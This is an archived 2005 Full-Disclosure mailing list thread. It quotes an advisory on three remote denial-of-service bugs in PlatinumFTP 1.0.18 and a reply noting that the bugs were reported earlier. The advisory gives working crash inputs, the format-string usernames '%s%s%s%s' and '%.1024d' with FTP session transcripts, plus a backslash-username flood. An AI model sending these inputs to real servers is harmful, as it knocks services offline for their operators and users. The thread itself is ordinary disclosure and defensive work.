lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
From: gary at pointblanksecurity.com (Gary H. Jones II) Subject: PlatinumFTP 1.0.18 remote DoS Reported in 2003 already... classic format string vulnerabilities http://www.derkeiler.com/Mailing-Lists/Securiteam/2003-12/0080.html -gary ----- Original Message ----- From: "ports" <ml@...tsonline.net> To: <full-disclosure@...ts.grok.org.uk> Sent: Saturday, March 12, 2005 11:57 AM Subject: [Full-disclosure] PlatinumFTP 1.0.18 remote DoS > Application: PlantinumFTP > Site: http://www.roboshareware.com/indexplatinumftp.php > Version: 1.0.18 and maybe lower > OS: Windows > Bug: Remote Denial of Service > > > ===== > Product: > PlatinumFTPserver simplifies management of all your Ftp clients with > regards to sending and receiving program and data files over an IP > connection. > > > ===== > About: > I didn't found any informations about the Bugs I've found and the > vendor doesn't seem to be interested in fixing problems (see History). > Since PlatinumFTP isn't a mainstream server I decided to make this > Disclosure. > > Well, I found 3 different ways do shut down (denial of service) a > PlatinumFTP 1.0.18 server. At least you doesn't need a valid user. > > > ===== > First Bug: > You can stop the server using %s%s%s%s as username. > > -------------------- schnipp -------------------- > ports@...m:~$ ftp 192.168.10.101 > Connected to 192.168.10.101. > 220-PlatinumFTPserver V1.0.18 > 220 Enter login details > Name (192.168.10.101:ports): %s%s%s%s > 421 Service not available, remote server has closed connection > Login failed. > No control connection for command: Transport endpoint is not connected > ftp> > -------------------- schnapp -------------------- > > > ===== > Second Bug: > You can stop the server using %.1024d as username. > > -------------------- schnipp -------------------- > ports@...m:~$ ftp 192.168.10.101 > Connected to 192.168.10.101. > 220-PlatinumFTPserver V1.0.18 > 220 Enter login details > Name (192.168.10.101:ports): %.1024d > 331 Password required for 000000000000000000000000000000000000000000000 > 00000000000000000000000000000000000000000000000000000000000000000000000 > 00000000000000000000000000000000000000000000000000000000000000000000000 > 00000000000000000000000000000000000000000000000000000000000000000000000 > 00000000000000000000000000000000000000000000000000000000000000000000000 > 00000000000000000000000000000000000000000000000000000000000000000000000 > 00000000000000000000000000000000000000000000000000000000000000000000000 > 00000000000000000000000000000000000000000000000000000000000000000000000 > 00000000000000000000000000000000000000000000000000000000000000000000000 > 00000000000000000000000000000000000000000000000000000000000000000000000 > 00000000000000000000000000000000000000000000000000000000000000000000000 > 00000000000000000000000000000000000000000000000000000000000000000000000 > 00000000000000000000000000000000000000000000000000000000000000000000000 > 00000000000000000000000000000000000000000000000000000000000000000000000 > 000000000000000000000000000000421 Service not available, remote server > has closed connection > Login failed. > No control connection for command: Transport endpoint is not connected > ftp> > -------------------- schnapp -------------------- > > > ===== > Third Bug: > Well, shuting down a server using the third bug is, compared to the > first Bugs, really tricky *cough*. If you put in a \ as username the > Server will show a requester on his console saying 'Incorrect Format: > HKEY_LOCAL_MACHINE\SOFTWARE\PlatinumFTPserver\Configuration\Users\'. > The ftp login process for the current session will stop until someone > affirmed this message. > > I wrote a little perl script to see if it's possible to shut the server > down and it's working. You just have to connect a couple of times using > the username \ and after a few connections (>50) the server will crash. > > Since most of you guys know how to write a script like that I doens't > attach it :) Of course you can find them later on my homepage. > > > ===== > History: > 2005-03-05: Found the Bugs and mailed the vendor > 2005-03-07: Mailed the vendor again using all mailaddresse I found > 2005-03-10: Created a yahoo-account *sigh* to make a forum post > 2005-03-12: Still no response... > > > > Well, now let's count the hours/days until someone is telling me I'm a > fool because I didn't made a working exploit out of it. > > > ports > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://www.secunia.com/ > >
Powered by blists - more mailing lists